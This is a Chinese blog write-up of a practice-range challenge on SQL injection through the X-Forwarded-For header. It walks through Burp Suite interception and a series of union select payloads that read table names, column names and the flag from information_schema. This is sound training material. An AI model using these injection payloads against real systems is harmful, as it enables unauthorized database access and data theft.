墨者學院-在線靶場-HTTP頭注入漏洞測試(X-Forwarded-for) Writeup

原創 s0mor 2020-02-20 14:49

首先題目提示

XFF注入,大致思路爲Burp抓包添加XFF請求頭進行注入。
啓動靶場
點擊進入墨者的任性網頁

Burpsuite抓包,放進Repeater

先GO一下
在這裏插入圖片描述
在請求頭中添加X-Forwarded-For
試了試 'and 1=1and 1=2都沒反應
當改爲or 1=1時,提示語法錯誤
在這裏插入圖片描述
在這裏插入圖片描述
繼續,union注入步驟

order by 5顯示未知字段,order by 4返回正常

得到數據庫中的字段數

在這裏插入圖片描述
在這裏插入圖片描述

union select 1,2,3,4

看看有哪些回顯點,發現多了一行商品,名稱,價格,數量分別爲2,3,4
在這裏插入圖片描述
在這裏插入圖片描述
爆數據庫版本和數據庫名

union select 1,2,version(),database()

在這裏插入圖片描述
在這裏插入圖片描述

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一個表名爲comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

在這裏插入圖片描述
在這裏插入圖片描述
第二個表名爲flag,應該是這個表了。

繼續

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一個字段名爲id,再試試第二個

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

在這裏插入圖片描述
flag應該就在這個字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag
在這裏插入圖片描述
回到最初頁面,驗證flag,得到key。
在這裏插入圖片描述
在這裏插入圖片描述

s0mor
發佈了27 篇原創文章 · 獲贊 6 · 訪問量 5193
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

re刷題第十天

re刷題第十天 0x00 easyre-153 這題無wp,別問我爲什麼沒有,我可能下了個假的題目 0x01 notsequence int __cdecl main() { _DWORD *v0; // eax s

Prowes5 2020-06-27 07:49:20

re刷題第八天

re刷題第八天 0x00 Reversing-x64Elf-100 載入IDA,找到關鍵代碼 __int64 __fastcall sub_4006FD(__int64 a1) { int i; // [rsp+14h] [

Prowes5 2020-06-27 07:49:20

re刷題第九天

re刷題第九天 0x00 tt3441810 知識點:彙編硬編碼 題目給出了一堆十六進制,轉換爲彙編看下,發現第一句是push 0x666c,之後進行了一些異或,加操作,emmm。。。看不太懂。想起來push在這裏的十六進制

Prowes5 2020-06-27 07:49:10

re刷題第七天

#re刷題第七天 回了躺家,耽擱了,繼續開始刷題吧 0x00 ReverseMe-120 還是老套路,載入IDA,看了下大致的邏輯,是比較清楚的,關鍵點就在於401000這個函數,簡單的動態調試了一下,發現是個base64解碼

Prowes5 2020-06-27 07:49:09

re刷題第五天

#re刷題第五天 補交一下昨天刷題的WP,今天要打護網杯就不刷題了,最近工作太忙了,有時間總結一下最近開發學到的知識 0x00 re1-100 考察點:進程間通信,靜態調式,反反調試 int __cdecl __noret

Prowes5 2020-06-27 07:49:09

re刷題第十一天

re刷題第十一天 0x00 catch-me 解壓兩次,載入IDA,發現大部分位SSE和AVX指令,F5不太好識別,動態調試一下吧 其實最重要的是上圖這個驗證,v3爲0xb11924e1,我們需要輸入0x4ff2da0a,來

Prowes5 2020-06-27 07:49:09

re每天一題(20200527)

re每天一題(20200527) 之前想要每天刷題被各種各樣的事情中斷了,重新撿起來這個吧。每天一題,會覆盤各比賽的題目,不過由於按照比賽來弄的話,一場比賽就會拖很長時間。就用每天一道題來約束吧,不一定是每天做一道,而是能夠保證

Prowes5 2020-06-27 07:49:08

re每日一題(20200530)(補)

re每日一題(20200530)(補) GKCTF2020 0x03 EzMachine 載入IDA,main函數不能F5,需要將0x1591的後三個字節nop int __cdecl main(int argc, cons

Prowes5 2020-06-27 07:49:08

re每日一題(20200528)

re每日一題(20200528) BabyDriver 2020GKCTF 64位驅動逆向,函數不是很多。看到\\Driver\\Kbdclass可以感覺是個鍵盤驅動,且調用了KdDisableDebugger()具有反調試。

Prowes5 2020-06-27 07:49:08

re每日一題(20200529)(補)

re每日一題(20200529)(補) GKCTF2020 Chellys_identity 關鍵比較函數爲sub_411721 int __usercall sub_41B3B0@<eax>(int a1@<xmm0>, i

Prowes5 2020-06-27 07:49:08

GXYCTF2019&GWCTF2019——Writeup

LetheSec 2020-03-04 23:21:10

攻防世界web新手練習區writeup(上)

守卫者 2020-02-24 21:44:05

upload-labs 通關

s0mor 2020-02-20 14:49:13

hackinglab解密關

s0mor 2020-02-20 14:49:13

Pikachu靶場-暴力破解

s0mor 2020-02-20 14:49:13